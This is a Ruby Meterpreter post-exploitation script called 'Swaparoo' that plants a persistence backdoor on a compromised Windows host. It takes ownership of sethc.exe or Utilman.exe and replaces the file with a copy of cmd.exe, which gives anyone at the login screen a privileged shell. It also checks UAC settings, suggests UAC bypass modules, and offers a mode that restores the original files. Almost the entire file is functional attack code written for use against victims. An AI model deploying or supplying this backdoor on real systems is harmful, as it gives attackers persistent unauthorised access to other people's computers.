# $Id:swaparoo.rb $
# $Revision: 01 $
# Meterpreter Swaparoo - Windows Backdoor Method (all Windows versions)
# Author: Un0wn_X
# Big Thanks to Hood3dRob1n with his massive support to this script
# E-mail: unownsec@gmail.com
# Follow @UnownSec
# website: http://unownsec.blogspot.com | http://kaoticcreations.blogspot.com/
# This was first pulished by Un0wn_X in Intern0t https://forum.intern0t.org/general-hacking-discussions/4637-backdoor-windows-8-7-vista.html
# PoC video: http://www.youtube.com/watch?v=fQna7LCw81Y
################## Variable Declarations ##################
session = client #Our victim session object we will work with
#Basic Arguments user can provide when running meterpreter script
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-u" => [ false, "Use Utilman.exe (Sethc.exe used by default)" ],
"-p" => [ false,"Path on target to find Sethc.exe or Utilman.exe (default is %SYSTEMROOT%\\\\system32\\\\)" ],
"-r" => [ false,"Remove payload & Return original back to its place (use with -u for Utilman.exe cleanup)" ]
)
################## Function Declarations ##################
#Usage
def usage
print_line("Windows Swaparoo - Sneaks a Backdoor Command Shell in place of Sticky Keys Prompt or Utilman assistant at Login Screen (requires admin privs)")
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
#check for proper privileges are in place to run the tasks (i.e. are we admin?)
def notadmin
print_error("You need admin privs to run this!")
print_error("Try using 'getsystem' or one of the many escalation scripts and try again.......")
raise Rex::Script::Completed
end
#Execute our list of command needed to achieve the backdooring (sethc.exe vs Utilman.exe) or cleanup tasks :p
def list_exec(session, cmdlst) #session is our meter sessions, cmdlst is our array of commands to run on target
r=''
session.response_timeout=120
cmdlst.each do |cmd|
begin
print_status("Executing: #{cmd}")
r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
break if d == ""
end
r.channel.close
r.close
rescue ::Exception => e
print_error("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
end
# check if UAC is enabled (the builtin for privs isn't workign for me for somereason so I made a new version), idk.....
def uac_enabled
#Confirm target could have UAC, then find out level its running at if possible
if session.sys.config.sysinfo['OS'] !~ /Windows Vista|Windows 2008|Windows [78]/
uac = false
else
begin
key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System',KEY_READ)
if key.query_value('EnableLUA').data == 1
uac = true
print_status("UAC is Enabled, checking level...")
# key.close
uac_level = key.query_value('ConsentPromptBehaviorAdmin').data
if uac_level.to_i == 2
print_error("UAC is set to 'Always Notify'")
print_error("Things won't work under these conditions.....")
raise Rex::Script::Completed
elsif uac_level.to_i == 5
print_error("UAC is set to Default")
print_error("You should try running 'exploit/windows/local/bypassuac' to bypass UAC restrictions if you haven't already")
elsif uac_level.to_i == 0
print_good("UAC Settings Don't appear to be an issue...")
uac = false
else
print_status("Unknown UAC Setting, if it doesn't work try things manually to see if UAC is blocking......")
uac = false
end
end
key.close
rescue::Exception => e
print_error("Error Checking UAC: #{e.class} #{e}")
end
end
return uac
end
##################### MAIN ######################
# Parse our user provided options and run post script accordingly....
sysroot = session.fs.file.expand_path("%SYSTEMROOT%") #now we can get base path for different versions of Windows
path = "#{sysroot}\\\\system32\\\\" #twice is nice (must escape properly for dir dividers
targetexe = 0
helpcall = 0
remove = 0
@@exec_opts.parse(args) do |opt, idx, val|
case opt
when "-h"
helpcall = 1 #Help Menu
when "-u"
targetexe = 1 #0=> Sethc.exe, 1=>Utilman.exe
when "-p"
path = val #override default path
when "-r"
remove = 1 #Run cleanup
end
end
#Make sure we were passed proper arguments to run
if helpcall == 1
usage
end
#we only can do this on windows :p
unsupported if not session.platform =~ /win/i
#Make sure we are admin
if session.railgun.shell32.IsUserAnAdmin()['return']
print_good("Confirmed, currently running as admin.....")
else
notadmin
end
#Check if UAC is enabled and potentially going to cause us problems on newer systems
if uac_enabled
print_error("Can't run this on target system without bypassing UAC first!")
print_status("Please make sure you have already done this or script will not work......")
print_status("")
else
print_good("Confirmed, UAC is not an issue!")
end
#Arrays with our commands we need to accomplish stuff:
sethc = [ "takeown /f #{path}sethc.exe",
"icacls #{path}sethc.exe /grant administrators:f",
"rename #{path}sethc.exe sethc.exe.bak",
"copy #{path}cmd.exe #{path}cmd3.exe",
"rename #{path}cmd3.exe sethc.exe" ]
utilman = [ "takeown /f #{path}Utilman.exe",
"icacls #{path}Utilman.exe /grant administrators:f",
"rename #{path}Utilman.exe Utilman.exe.bak",
"copy #{path}cmd.exe #{path}cmd3.exe",
"rename #{path}cmd3.exe Utilman.exe" ]
sethc_cleanup = [ "takeown /f #{path}sethc.exe",
"icacls #{path}sethc.exe /grant administrators:f",
"takeown /f #{path}sethc.exe.bak",
"icacls #{path}sethc.exe.bak /grant Administrators:f",
"del #{path}sethc.exe",
"rename #{path}sethc.exe.bak sethc.exe" ]
utilman_cleanup = [ "takeown /f #{path}Utilman.exe",
"icacls #{path}Utilman.exe /grant administrators:f",
"takeown /f #{path}utilman.exe.bak",
"icacls #{path}utilman.exe.bak /grant Administrators:f",
"del #{path}Utilman.exe",
"rename #{path}Utilman.exe.bak Utilman.exe" ]
#Check if we running in cleanup mode or backdoor mode, act accordingly
if remove.to_i > 0
print_status("Starting the Swaparoo cleanup process.....")
#Check if using Utilman method or standard Sethc method
if targetexe.to_i > 0
list_exec(session, utilman_cleanup)
else
list_exec(session, sethc_cleanup)
end
else
#Check for signs of previous backdooring, if so this can overwrite the backup file which means you can't cleanup afterwards! Bail out if found as a result and have user remove, rename, or run cleanup to make it ok.....
print_status("Starting the Swaparoo backdooring process.....")
if targetexe.to_i > 0
if session.fs.file.exists?("#{path}utilman.exe.bak")
print_error("Target appears to have already been backdoored!")
print_error("Delete or rename the backup file (sethc.exe.bak or utilman.exe.bak) manually or run the -r option for running cleanup tasks.....")
raise Rex::Script::Completed
else
list_exec(session, utilman)
end
else
if session.fs.file.exists?("#{path}sethc.exe.bak")
print_error("Target appears to have already been backdoored!")
print_error("Delete or rename the backup file (sethc.exe.bak or utilman.exe.bak) manually or run the -r option for running cleanup tasks.....")
raise Rex::Script::Completed
else
list_exec(session, sethc)
end
end
end
# All done, peace out!
print_status("Finished Swaparoo!")
if remove.to_i > 0
print_good("System should be restored back to normal!")
else
if targetexe.to_i > 0
print_good("Press the Windows key + U or Click on the Blue Help icon at lower left on Login Screen and you should be greeted by a shell!")
else
print_good("Press Shift key 5 times at Login Screen and you should be greeted by a shell!")
end
end
#EOF